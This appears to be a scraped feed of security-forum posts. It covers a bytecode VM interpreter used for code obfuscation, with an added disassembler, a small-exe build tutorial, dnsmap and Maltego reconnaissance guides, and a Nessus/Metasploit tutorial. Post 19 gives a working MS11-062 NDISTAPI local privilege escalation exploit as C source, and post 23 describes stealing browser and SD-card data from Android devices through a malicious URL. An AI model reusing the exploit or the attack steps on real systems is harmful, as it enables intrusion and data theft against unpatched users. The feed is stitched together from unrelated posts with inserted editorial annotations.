    *(PDWORD)mem32 = imm32;
}

// Every reg/reg, reg/imm32 and reg/mem32 handler below follows the same layout:
// skip the opcode, fetch the operands, then apply the operation if the register
// index is valid (indices 8 and above are silently ignored).
void VMovRegReg(PVMCONTEXT c)
{
    BYTE DestReg, SrcReg;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( ( DestReg < 8 ) && ( SrcReg < 8 ) )
        c->Reg[DestReg] = c->Reg[SrcReg];
}

void VMovRegImm(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD imm32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] = imm32;
}

void VMovRegMem(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD mem32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] = *(PDWORD)mem32;
}

void VADDRegReg(PVMCONTEXT c)
{
    BYTE DestReg, SrcReg;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( ( DestReg < 8 ) && ( SrcReg < 8 ) )
        c->Reg[DestReg] += c->Reg[SrcReg];
}

void VADDRegImm(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD imm32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] += imm32;
}

void VADDRegMem(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD mem32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] += *(PDWORD)mem32;
}

void VSUBRegReg(PVMCONTEXT c)
{
    BYTE DestReg, SrcReg;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( ( DestReg < 8 ) && ( SrcReg < 8 ) )
        c->Reg[DestReg] -= c->Reg[SrcReg];
}

void VSUBRegImm(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD imm32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] -= imm32;
}

void VSUBRegMem(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD mem32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] -= *(PDWORD)mem32;
}

void VMulEaxReg(PVMCONTEXT c)
{
    BYTE SrcReg;
    c->EIP++;
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( SrcReg < 8 )
        c->Reg[REGISTER_EAX] *= c->Reg[SrcReg];
}

// div eax, reg: unsigned division like x86 DIV, quotient in EAX and remainder in EDX.
// (The original divided EAX and then overwrote the quotient with quotient % reg,
// and would also fault on a zero divisor.)
void VDivEaxReg(PVMCONTEXT c)
{
    BYTE SrcReg;
    c->EIP++;
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( SrcReg < 8 && c->Reg[SrcReg] != 0 ) {
        DWORD quotient = c->Reg[REGISTER_EAX] / c->Reg[SrcReg];
        c->Reg[REGISTER_EDX] = c->Reg[REGISTER_EAX] % c->Reg[SrcReg];
        c->Reg[REGISTER_EAX] = quotient;
    }
}

void VANDRegReg(PVMCONTEXT c)
{
    BYTE DestReg, SrcReg;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( ( DestReg < 8 ) && ( SrcReg < 8 ) )
        c->Reg[DestReg] &= c->Reg[SrcReg];
}

void VAndRegImm(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD imm32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] &= imm32;
}

// Defined but never given a slot in inst_table (kept that way to preserve the opcode numbering).
void VAndRegMem(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD mem32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] &= *(PDWORD)mem32;
}

void VORRegReg(PVMCONTEXT c)
{
    BYTE DestReg, SrcReg;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    SrcReg = *(PBYTE)c->EIP; AddCode(c, 1);
    if ( ( DestReg < 8 ) && ( SrcReg < 8 ) )   // logical &&, the original used bitwise &
        c->Reg[DestReg] |= c->Reg[SrcReg];
}

void VORRegImm(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD imm32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    imm32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] |= imm32;
}

void VORRegMem(PVMCONTEXT c)
{
    BYTE DestReg;
    DWORD mem32;
    c->EIP++;
    DestReg = *(PBYTE)c->EIP; AddCode(c, 1);
    mem32 = *(PDWORD)c->EIP; AddCode(c, 4);
    if ( DestReg < 8 )
        c->Reg[DestReg] |= *(PDWORD)mem32;
}

// Opcode table: the opcode byte is the index into this array.
const INST inst_table[23] = {
    {VRetn}, {VJmp}, {VPUSHImm}, {VPUSHReg}, {VPUSHMem}, {VPOPReg}, {VPOPMem}, {VMovRegReg},
    {VMovRegImm}, {VMovRegMem}, {VADDRegReg}, {VADDRegImm}, {VADDRegMem}, {VSUBRegReg}, {VSUBRegImm}, {VSUBRegMem},
    {VMulEaxReg}, {VDivEaxReg}, {VANDRegReg}, {VAndRegImm}, {VORRegReg}, {VORRegImm}, {VORRegMem}};

VMCONTEXT ExecuteVM(LPVOID Code, DWORD Size)
{
    INST Ins;
    BYTE Op;
    LPVOID Stack;
    VMCONTEXT Context;

    Context.EIP = 0;
    for (Op = 0; Op < 8; Op++)          // the original zeroed only 7 registers, leaving EDI uninitialised
        Context.Reg[Op] = 0;

    Stack = GlobalAlloc(GMEM_FIXED, 1024 * 1024 * 2);
    if (Stack) {
        Context.Reg[REGISTER_ESP] = (DWORD)Stack;
        Context.EIP = (DWORD)Code;
        while (Context.EIP <= ((DWORD)Code + Size - 1)) {
            Op = *(PBYTE)Context.EIP;
            if (Op >= sizeof(inst_table) / sizeof(inst_table[0]))   // unknown opcode: stop instead of indexing past the table
                break;
            Ins = inst_table[Op];
            Ins.FunctionCall(&Context);
            if (Op == 0) break;          // retn
        }
        GlobalFree(Stack);
    }
    return Context;
}

int main(void)
{
    BYTE Code[13] = {0x08,0x00,0x05,0x00,0x00,0x00,   // mov eax, 5
                     0x0B,0x00,0x05,0x00,0x00,0x00,   // add eax, 5
                     0x00};                           // retn
    VMCONTEXT Context = ExecuteVM(Code, sizeof(Code));
    std::cout << Context.Reg[REGISTER_EAX] << std::endl;   // prints 10
    return 0;
}

Source: ic0de.org
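An added example, not part of the ic0de.org post: a small C disassembler for the bytecode that ExecuteVM above accepts. When virtualized code like this turns up in a sample, recovering the VM's instruction set and writing a decoder for it is the analyst's first step, and the same decoder doubles as a check for the two inputs the dispatcher mishandles (opcodes past the end of inst_table and operands that run past the buffer). Opcode numbers and operand widths are taken from the post's inst_table (VAndRegMem has no opcode there); the names vm_decode, vm_disasm and vm_decode_text are mine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Operand shapes used by the VM above; the opcode byte is the index into vm_isa. */
enum { K_NONE, K_IMM, K_REG, K_MEM, K_REG_REG, K_REG_IMM, K_REG_MEM };
static const struct { const char *name; int kind; } vm_isa[23] = {
    {"retn", K_NONE},    {"jmp", K_IMM},      {"push", K_IMM},     {"push", K_REG},
    {"push", K_MEM},     {"pop", K_REG},      {"pop", K_MEM},      {"mov", K_REG_REG},
    {"mov", K_REG_IMM},  {"mov", K_REG_MEM},  {"add", K_REG_REG},  {"add", K_REG_IMM},
    {"add", K_REG_MEM},  {"sub", K_REG_REG},  {"sub", K_REG_IMM},  {"sub", K_REG_MEM},
    {"mul eax,", K_REG}, {"div eax,", K_REG}, {"and", K_REG_REG},  {"and", K_REG_IMM},
    {"or", K_REG_REG},   {"or", K_REG_IMM},   {"or", K_REG_MEM}};  /* VAndRegMem has no opcode */
static const char *vm_reg[8] = {"eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"};
static const char *regname(uint8_t r) { return r < 8 ? vm_reg[r] : "bad_reg"; }

/* Operands are little-endian DWORDs, read the way the VM reads them with *(PDWORD)EIP. */
static unsigned le32(const uint8_t *p) {
    return (unsigned)p[0] | (unsigned)p[1] << 8 | (unsigned)p[2] << 16 | (unsigned)p[3] << 24;
}

/* Decode the instruction at code[off] into out. Returns bytes consumed, or 0 for an unknown
 * opcode or truncated operand (where ExecuteVM would index past inst_table or read past the buffer). */
size_t vm_decode(const uint8_t *code, size_t size, size_t off, char *out, size_t outsz)
{
    static const size_t width[] = {0, 4, 1, 4, 2, 5, 5};   /* operand bytes per kind */
    if (off >= size || code[off] >= 23) return 0;
    int kind = vm_isa[code[off]].kind;
    const char *n = vm_isa[code[off]].name;
    const uint8_t *p = code + off + 1;
    if (off + 1 + width[kind] > size) return 0;
    switch (kind) {
    case K_NONE:    snprintf(out, outsz, "%s", n); break;
    case K_IMM:     snprintf(out, outsz, "%s 0x%x", n, le32(p)); break;
    case K_REG:     snprintf(out, outsz, "%s %s", n, regname(p[0])); break;
    case K_MEM:     snprintf(out, outsz, "%s [0x%x]", n, le32(p)); break;
    case K_REG_REG: snprintf(out, outsz, "%s %s, %s", n, regname(p[0]), regname(p[1])); break;
    case K_REG_IMM: snprintf(out, outsz, "%s %s, 0x%x", n, regname(p[0]), le32(p + 1)); break;
    default:        snprintf(out, outsz, "%s %s, [0x%x]", n, regname(p[0]), le32(p + 1)); break;
    }
    return 1 + width[kind];
}

/* Linear sweep from offset 0, stopping at retn like ExecuteVM's dispatch loop.
 * Returns the instruction count, or -1 if decoding fails or no retn is reached. */
int vm_disasm(const uint8_t *code, size_t size, int print)
{
    char text[64];
    int count = 0;
    for (size_t off = 0; off < size; ) {
        size_t n = vm_decode(code, size, off, text, sizeof text);
        if (n == 0) return -1;
        if (print) printf("%04zx: %s\n", off, text);
        count++;
        if (code[off] == 0) return count;   /* retn */
        off += n;
    }
    return -1;
}
/* Decoded text of one instruction in a static buffer, for callers that only want the string. */
const char *vm_decode_text(const uint8_t *code, size_t size, size_t off)
{
    static char buf[64];
    if (vm_decode(code, size, off, buf, sizeof buf) == 0) snprintf(buf, sizeof buf, "<bad>");
    return buf;
}
/* The post's own 13-byte program (mov eax, 5 ; add eax, 5 ; retn) and a constructed buffer whose first byte (0x17 = 23) is not a valid opcode. */
const uint8_t vm_sample[13] = {0x08,0,5,0,0,0, 0x0B,0,5,0,0,0, 0x00};
const uint8_t vm_bad[2] = {0x17, 0x00};

int main(void) { return vm_disasm(vm_sample, sizeof vm_sample, 1) == 3 ? 0 : 1; }
```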
  18. Building small exe in VC++ 2010 li0n.coder hi all, this is my first post at this amazing forum. In this tutorial I will guide you step by step to make the smallest possible native win32 application by using Visual C++ 2010 Express. The reason for this tutorial is that VS 6.0 is very old but most people still use it because it makes small native exes; also most projects were made with VS 6.0, so it is hard for some to convert them to the new edition of VS.
1- download and install Visual C++ 2010 Express (free)
2- File>New>Project
3- choose Win32 project, let us name it smallexe, then press OK
4- a new window will pop up, click Next
5- check Empty project then click Finish
6- go to Project>Add New Item>C++ File, let us name it main, then press OK
7- paste this code which shows a simple message box

#include <windows.h>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    MessageBoxA(NULL, "my small exe!", "info", 0);
    return 0;
}

8- now go to Project>Properties
9- press Configuration Manager and set the active solution configuration to "Release", then close
10- [optional step] many codes around will generate errors when you build them, simply because they were written in VS 6.0 and they don't support Unicode; if you don't know how to convert the project to Unicode we can disable this feature: Configuration Properties>Character Set>change to "Not Set"
11- go to C/C++>Optimization>Optimization>choose Minimize Size
12- go to C/C++>Code Generation>Runtime Library>choose multi threaded dll (/MT). Why? This option will remove the dependency on msvcr100.dll, which is not available natively on Windows XP
13- go to Linker>Manifest File>Generate Manifest>choose No
14- go to Linker>Debugging>Generate Debug Info>choose No
15- go to Linker>Advanced>Entry Point>write WinMain
16- build the project
yaaaay, a 2.5kb app that runs without any dependency!!
when you write a bigger project use minicrt.lib [download from attachments], it will also decrease the size: Linker>Input>Additional Dependencies>write minicrt.lib; hope it works for you guys Source: ic0de.org
  19. Microsoft Windows NDISTAPI Local Privilege Escalation Vulnerability (MS11-062)

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
    char InputBuffer[4] = {0};
    ULONG dwReturnSize;
    HANDLE dev_handle;

    printf("\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n");

    // Open the NDISTAPI device object (OPEN_EXISTING: the device already exists; CREATE_ALWAYS is for files)
    dev_handle = CreateFileA("\\\\.\\NDISTAPI", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, 0);
    if (dev_handle == INVALID_HANDLE_VALUE) {
        printf("CreateFile failed: %lu\n", GetLastError());
        return 1;
    }

    // The IOCTL from the original PoC
    DeviceIoControl(dev_handle, 0x8fff23d4, InputBuffer, 4, (PVOID)0x80000000, 0, &dwReturnSize, NULL);

    CloseHandle(dev_handle);
    return 1;
}

Via: http://www.softrce.net/archives/405 Source: http://www.ic0de.org/showthread.php?10860-SRC-Microsoft-Windows-NDISTAPI-Local-Privilege-Escalation-Vulnerability-%28MS11-062%29
  20. Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial Nessus is the best vulnerability scanner, management and assessment tool, and Metasploit is the best database, software, program and tool for exploits. They both are the best in their domain, but when we connect them to each other an extra smartness and purity occurs; in short, we will make the best penetration testing tool for exploiting an operating system by using Nessus with Metasploit. However there is a different way to do so and we have shared different methods and tutorials to integrate Metasploit with Nessus or vice versa. In this article we will discuss the video tutorial in which I will show you the power of Nessus and Metasploit. This tutorial is a little different from other tutorials that have been discussed before about Nessus, Metasploit, Nmap and Nexpose. Here is the list of some tutorials, and then I will show you the difference between them and this tutorial.
Metasploit Autopwn With Nessus Backtrack 5 Tutorial
Integrate Nessus With Metasploit- Tutorial
Nessus Setup On Backtrack 5
Metasploit Remote Desktop Exploit-Backtrack 5
Below is the tutorial in which I will show some advanced features of Nessus, like the Filter feature to get the exploits available to the public, and by using Metasploit I will show you how to exploit a computer or a vulnerability that has been found by Nessus. Video: http://www.youtube.com/watch?feature=player_embedded&v=2zBqnHrUWDU#! Source: Nessus With Metasploit Tutorial- Backtrack 5 Video Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  21. Dnsmap - DNS Network Mapper Information is very important for performing penetration testing; at the very first step ethical hackers/penetration testers try to get the maximum information about the target. The steps required for information gathering or footprinting have been discussed in an earlier article; click here to read. After all, there are some automatic tools present to gather the information and these tools also help to map the victim network by using their official websites. In this article we will cover DNSMAP. Dnsmap is a passive network mapper and normally known as a subdomain brute forcer; it was originally released in 2006 and is used by pentesters during the information gathering/enumeration phase of infrastructure security assessments. Dnsmap is open source and tested on Linux based operating systems, although it can be used on FreeBSD and the Windows platform by using Cygwin; dnsmap was included in Backtrack 2, 3 and 4.
Key Features
IPv6 support
Makefile included
delay option (-d) added. This is useful in cases where dnsmap is killing your bandwidth
ignore IPs option (-i) added. This allows ignoring user-supplied IPs from the results. Useful for domains which cause dnsmap to produce false positives
changes made to make dnsmap compatible with OpenDNS
disclosure of internal IP addresses (RFC 1918) is reported
updated built-in wordlist
included a standalone three-letter acronym (TLA) subdomains wordlist
domains susceptible to "same site" scripting are reported
completion time is now displayed to the user
mechanism to attempt to bruteforce wildcard-enabled domains
unique filename containing timestamp is now created when no specific output filename is supplied by user
various minor bugs fixed
DNSMAP Tutorial
After downloading, extract it, then open a terminal, go to the place where you have extracted dnsmap and follow these steps:
Type gcc dnsmap.c -o dnsmap or g++ dnsmap.c -o dnsmap (make sure you have a C compiler installed)
After this make it executable: type chmod +x dnsmap
And then run it by typing ./dnsmap domain.com

$ dnsmap baidu.com
dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)

[+] searching (sub)domains for baidu.com using built-in wordlist
accounts.baidu.com
IP address #1: 10.11.252.74
events.baidu.com
IP address #1: 202.108.23.40
finance.baidu.com
IP address #1: 60.28.250.196

Download: http://dnsmap.googlecode.com/files/dnsmap-0.30.tar.gz Source: http://www.ehacking.net/2011/02/dnsmap-dns-network-mapper.html
  22. Maltego- Information Gathering Tool Tutorial This article is linked with our series of articles on footprinting (information gathering); for the previous story click here. Now, besides the whois, Nslookup and tracert commands, there are some tools available on the market to perform footprinting professionally; these tools provide a wide range of options and techniques to perform valuable footprinting. In this article we will talk about Maltego. Maltego is an open source forensic application that is used to gather maximum information for the purpose of forensics and pen testing; it can represent a result in a very formal and easy to understand format. It is available in two flavours: one is the community edition and the other is the commercial version. You can download Maltego for your Windows based operating system and for Linux based operating systems. Click here to grab your copy. This is the top and main navigation bar; there are two tabs, one is the Investigate tab and the other is the Manage tab. Now we are on the Manage tab, where we can see different entities and transforms, but the point of consideration is the Palette option: turn it on. The Palette option is the main option from which you have to drag your main task; for example, if you want to gather information about a person, then drag the Person option and enter the name of the person about whom you are going to gather information. After that, right-click on the person and suppose we have to find the email addresses of the related person, then in the email option click All in the set and your scan will begin. Output depends on your computer processing speed and your internet speed. Now we have found the related email addresses. Is this enough? No, there are more amazing options present in Maltego, like gathering information about DNS servers. For this purpose see the video demonstration of Maltego. Video: http://www.youtube.com/watch?v=QMypTK-dVaI&feature=player_embedded#!
Source: Maltego- Information Gathering Tool Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  23. Android Data Stealing with Metasploit by creatures November 15, 2011 This vulnerability was found by Thomas Cannon back in 2010, I think. I just thought this is interesting to share with Android users. I tried this exploit on Marvell tablets with Android versions 1.6 – 2.2. The big one is using 1.6 and the small one is using 2.2. For some reason this tablet has been customized by a private company and is used for a project. Screenshot1: http://www.theprojectxblog.net/wp-content/uploads/2011/11/319-1024x768.jpg Firing up Metasploit, then using android_htmlfileprovider Screenshot2: http://www.theprojectxblog.net/wp-content/uploads/2011/11/305-1024x768.jpg Screenshot3: http://www.theprojectxblog.net/wp-content/uploads/2011/11/300-768x1024.jpg When the user accesses the malicious URL that we have set up, the consequence is that the attacker will be able to get any data, including any sensitive data from /proc, browser files such as history, bookmarks and maybe even sessions. Also you can grab data from sdcards. As explained by Thomas Cannon in his blog: The Android browser doesn't prompt the user when downloading a file, for example "payload.html"; it automatically downloads to /sdcard/download/payload.html. It is possible, using JavaScript, to get this payload to automatically open, causing the browser to render the local file. When opening an HTML file within this local context, the Android browser will run JavaScript without prompting the user. While in this local context, the JavaScript is able to read the contents of files (and other data). Screenshot4: http://www.theprojectxblog.net/wp-content/uploads/2011/11/293-1024x768.jpg The majority are now using Android phones and tablets, especially here in PHL. Google should not be the only one who needs to fix this, but also other companies producing or manufacturing Android phones and tablets with the same version; but most companies that I know just don't give a damn about fixing and updating, etc.
PS: I also tried it on an Android 2.3 Archos and the exploit doesn't work. Take care guys and be aware. Source: http://www.theprojectxblog.net/android-data-stealing-with-metasploit/
  24. YOU -> Server 1 -> ... -> Server n -> Victim / Victim -> Server n -> ... -> Server 1 -> YOU. Just as the data reaches you, no matter how many "filters" it passes through, anyone can reach you the same way, just like the data, step by step... As for this fashion of "hacking" websites, it seems like stupidity to me. But the biggest stupidity is that after you crap yourself, you get slapped for it on top. That is, after doing something the law doesn't allow (unauthorized access), you also brag to everyone that you were the "1337" one.
  25. They're rubbish. The videos explain nothing, they are "demonstrative" (I'm not even sure that's the right word for them), and that article looks like it was written by a kid who used 2 crypters and maybe thinks he's a big shot. It would be one thing if cobein, Karcrack, steve (if it weren't for them and a few others with brilliant ideas there wouldn't be so many crypters now, although the original ideas belong to Matt Pietrek from many, many years ago) or other people who at least know what the structure of an executable is were explaining; it's quite another when that character, who is nothing more than a home user, explains it...